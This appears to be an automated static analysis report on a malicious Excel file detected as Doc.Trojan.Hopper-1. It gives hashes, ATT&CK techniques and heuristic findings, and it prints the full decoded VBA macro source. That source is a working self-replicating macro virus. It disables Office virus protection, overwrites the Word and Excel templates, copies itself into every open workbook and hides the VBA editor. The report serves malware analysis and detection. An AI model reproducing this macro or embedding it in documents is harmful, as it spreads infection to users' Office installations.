Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 95b23ab5e434eb52…

MALICIOUS

Office (OLE)

19.5 KB Created: 2001-01-26 17:41:35 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 82ebc5fb4b8f2eff49df09bc5fe0ed31 SHA-1: 5f74166677c8d06930d3aa70fba510cb114f7f73 SHA-256: 95b23ab5e434eb5207b35d37737f5644ee5149dd8589a1130ef8ec0d64ef0d90
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

This Excel file contains malicious VBA macros that attempt to establish persistence. The script modifies the Excel startup directory by saving a file named 'cs.xls' and embedding its own malicious VBA code into the user's Excel template ('NormalTemplate'). This allows the macro to execute automatically whenever Excel is started. The ClamAV detection 'Doc.Trojan.Hopper-1' further supports the malicious nature of the file.

Heuristics 4

  • ClamAV: Doc.Trojan.Hopper-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Hopper-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4057 bytes
SHA-256: 4fcf540b1d8a611f87574084d4a7535ebe034ded4adf32f6037a8674895e0ecc
Detection
ClamAV: Doc.Trojan.Hopper-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
'MultiSys
Private RunFlag As Boolean
Private Sub Document_Close()
    On Error Resume Next
    SetAttr NormalTemplate.Path + "\" + NormalTemplate, 0
    Options.SaveNormalPrompt = False
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Set NT = NormalTemplate.VBProject.VBComponents(1).CodeModule
    Set AD = ActiveDocument.VBProject.VBComponents(1).CodeModule
    If NT.Lines(1, 1) <> "'MultiSys" Then
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, AD.Lines(1, AD.CountOfLines)
    End If
    xlsObj = GetObject(, "Excel.Application"): Quit = 0
    If xlsObj = "" Then Set xlApp = CreateObject("Excel.Application"): Quit = 1
    If UCase(Dir(xlApp.Application.StartupPath + "\cs.xls")) <> UCase("CS.XLS") Then
        xlApp.Workbooks.Add.SaveAs xlApp.Application.StartupPath & "\cs.xls"
        xlApp.Workbooks("cs.xls").VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, NT.Lines(1, NT.CountOfLines)
        xlApp.Workbooks("cs.xls").Close SaveChanges:=True
    End If
    If Quit = 1 Then xlApp.Application.Quit
    If AD.Lines(1, 1) <> "'MultiSys" Then
        AD.DeleteLines 1, AD.CountOfLines
        AD.InsertLines 1, NT.Lines(1, NT.CountOfLines)
    End If
End Sub
Sub ViewVBCode(): Stealth: End Sub
Sub ToolsMacro(): Stealth: End Sub
Sub FileTemplates(): Stealth: End Sub
Private Sub Stealth(): On Error Resume Next
    ShowVisualBasicEditor = 0: Application.EnableCancelKey = 0
End Sub
Private Sub Workbook_BeforeClose(Cancel As Boolean)
    On Error Resume Next
    Set WordObj = GetObject(, "Word.Application"): Quit = 0
    If WordObj = "" Then Set WordObj = CreateObject("Word.Application"): Quit = 1
    Set NT = WordObj.NormalTemplate.VBProject.VBComponents(1).CodeModule
    SetAttr WordObj.NormalTemplate.Path + "\" + WordObj.NormalTemplate, 0
    If NT.Lines(1, 1) <> "'MultiSys" Then
        WordObj.Options.SaveNormalPrompt = False
        NT.DeleteLines 1, NT.CountOfLines
        NT.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
    End If
    If Quit = 1 Then WordObj.Application.Quit
    Workbooks.Add.SaveAs Filename:=Application.StartupPath & "\cs.xls", FileFormat:=xlNormal, AddToMru:=False
    For i = 1 To Workbooks.Count
        If Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, 1) <> "'MultiSys" Then
            Workbooks(i).VBProject.VBComponents.Item("ThisWorkbook").CodeModule.InsertLines 1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.Lines(1, ThisWorkbook.VBProject.VBComponents.Item("ThisWorkbook").CodeModule.CountOfLines)
        End If
    Next
    Workbooks("cs.xls").Close SaveChanges:=True
End Sub

Attribute VB_Name = "Foglio1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Foglio3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True